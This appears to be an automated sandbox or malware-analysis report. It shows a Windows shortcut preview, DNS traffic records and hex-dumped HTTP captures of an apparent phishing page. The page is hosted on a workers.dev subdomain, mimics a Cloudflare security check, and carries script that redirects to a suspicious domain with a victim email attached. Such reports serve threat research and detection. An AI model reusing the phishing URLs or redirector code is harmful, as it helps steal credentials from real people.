Preview:	L..................F.@.. ...$+.,.......~.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I/Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 20:05:48.821666956 CET	53	51086	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:48.907052994 CET	53	60497	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:49.977873087 CET	53	58939	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:53.429215908 CET	61711	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:53.429399967 CET	58291	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:53.436286926 CET	53	61711	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:53.436359882 CET	53	58291	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:54.938817978 CET	55453	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:54.939544916 CET	54361	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:54.950304031 CET	53	55453	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:54.953222036 CET	53	54361	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:56.182466030 CET	58940	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:56.182807922 CET	56623	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:56.189193964 CET	53	58940	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:56.190049887 CET	53	56623	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:57.699234009 CET	63144	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:57.699404001 CET	54705	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:57.706469059 CET	50530	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:57.706478119 CET	53	63144	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:57.706489086 CET	53	54705	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:57.706646919 CET	58527	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:57.713043928 CET	53	50530	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:57.713402033 CET	53	58527	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:59.443839073 CET	59862	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:59.443978071 CET	50472	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:05:59.652674913 CET	53	50472	1.1.1.1	192.168.2.5
Jan 15, 2025 20:05:59.652700901 CET	53	59862	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:06.933796883 CET	53	53670	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:12.102382898 CET	50962	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:12.102524042 CET	52149	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:12.127305031 CET	53	52149	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:12.127506971 CET	53	50962	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:13.945766926 CET	52126	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:13.946150064 CET	60718	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:13.953255892 CET	50783	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:13.953466892 CET	56246	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:13.986084938 CET	53	50783	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:14.004679918 CET	53	56246	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:14.142966032 CET	53	52126	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:14.319960117 CET	53	60718	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:14.936240911 CET	65014	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:14.936530113 CET	57393	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:14.953022957 CET	53	57393	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:14.966806889 CET	53	65014	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:17.381102085 CET	53	65231	162.159.36.2	192.168.2.5
Jan 15, 2025 20:06:17.848470926 CET	55536	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:17.856085062 CET	53	55536	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:19.956943035 CET	57516	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:20.318504095 CET	53	57516	1.1.1.1	192.168.2.5
Jan 15, 2025 20:06:23.877394915 CET	56616	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:53.489311934 CET	53809	53	192.168.2.5	1.1.1.1
Jan 15, 2025 20:06:53.496500015 CET	53	53809	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:55 UTC	706	OUT	GET /?qrc=test@test.org HTTP/1.1 Host: 52f1897b.5648702dd4d5255cab645104.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:56 UTC	788	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:05:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABZE63BK9nxX%2FTjCi5WdT40RIcNyO3h%2FkwYrCcqXo3thbpf7GRx3%2FPLJyh23TyUhXRzNhOLxQ0dx9XdPoijBLICxdi3svzaguLnGCkwAHdbllokGKY24uYt9c7u5s41NT9haDCsfNZtKvZpjboATe7kVjHYesW3x0hb4wcJjUEo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902823dd6a8eaace-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13785&min_rtt=13745&rtt_var=5183&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2898&recv_bytes=1284&delivery_rate=212440&cwnd=32&unsent_bytes=0&cid=1d7fa243d15278c0&ts=209&x=0"
2025-01-15 19:05:56 UTC	1369	IN	Data Raw: 31 36 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 168a<!doctype html><html lang="en-US"><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-sc
2025-01-15 19:05:56 UTC	1369	IN	Data Raw: 20 74 65 78 74 3b 20 0a 20 20 20 20 7d 0a 0a 20 20 20 20 6c 65 74 20 73 78 20 3d 20 22 68 74 74 70 73 3a 2f 2f 65 6e 2d 72 65 70 6f 6f 66 69 63 65 61 69 72 66 69 78 2e 69 63 75 2f 3f 63 74 73 6c 6c 69 78 77 26 71 72 63 3d 74 65 73 74 40 74 65 73 74 2e 6f 72 67 22 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 20 50 55 42 4c 49 43 5f 4b 45 59 20 3d 20 60 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 20 20 20 20 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 78 43 4a 42 77 63 59 38 74 30 41 71 50 71 75 55 2b 41 68 31 0a 20 20 20 20 52 30 45 50 57 6c 63 44 35 58 53 58 68 4f 45 65 30 30 38 34 34 54 6b 69 47 4c 46 48 6e 4d 57 51 45 75 67 68 30 7a 59 68 Data Ascii: text; } let sx = "https://en-repooficeairfix.icu/?ctsllixw&qrc=test@test.org"; const PUBLIC_KEY = `-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCJBwcY8t0AqPquU+Ah1 R0EPWlcD5XSXhOEe00844TkiGLFHnMWQEugh0zYh
2025-01-15 19:05:56 UTC	1369	IN	Data Raw: 49 45 44 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 27 43 4f 4e 4e 45 43 54 49 4f 4e 20 54 4f 20 48 4f 53 54 20 46 41 49 4c 45 44 27 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 78 68 72 2e 73 65 6e 64 28 29 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 2e 68 31 2c 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 Data Ascii: IED'; } } else { document.body.innerHTML = 'CONNECTION TO HOST FAILED'; } } }; xhr.send(); } </script></head><style> .h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding
2025-01-15 19:05:56 UTC	1369	IN	Data Raw: 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 6c 69 6e 65 2d 68 65 Data Ascii: 75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width:720px){.main-content{margin-top:4rem}.h1{line-height:1.75rem;font-size:1.5rem}.core-msg,.h2{line-he
2025-01-15 19:05:56 UTC	302	IN	Data Raw: 2d 74 65 78 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 57 65 20 6e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 20 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 20 53 65 63 75 72 69 Data Ascii: -text"> <div>We need to review the security of your connection before proceeding. </div> </div> </div> </div> <div class="footer" role="contentinfo"> <div class="footer-inner"> <div class="text-center"> Performance & Securi
2025-01-15 19:05:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:56 UTC	604	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:56 UTC	386	IN	HTTP/1.1 302 Found Date: Wed, 15 Jan 2025 19:05:56 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/e0c90b6a3ed1/api.js Server: cloudflare CF-RAY: 902823e1ebd5182d-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:05:57 UTC	588	OUT	GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:05:57 UTC	471	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:05:57 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47521 Connection: close accept-ranges: bytes last-modified: Wed, 08 Jan 2025 13:42:47 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 902823e69d3f729f-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:05:57 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)\|\|jt(e,r)\|\|zt(e,r)\|\|qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J\|\|(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var pe;(fu
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK\|\|e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null\|\|r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null\|\|n===void 0?void
2025-01-15 19:05:57 UTC	1369	IN	Data Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var 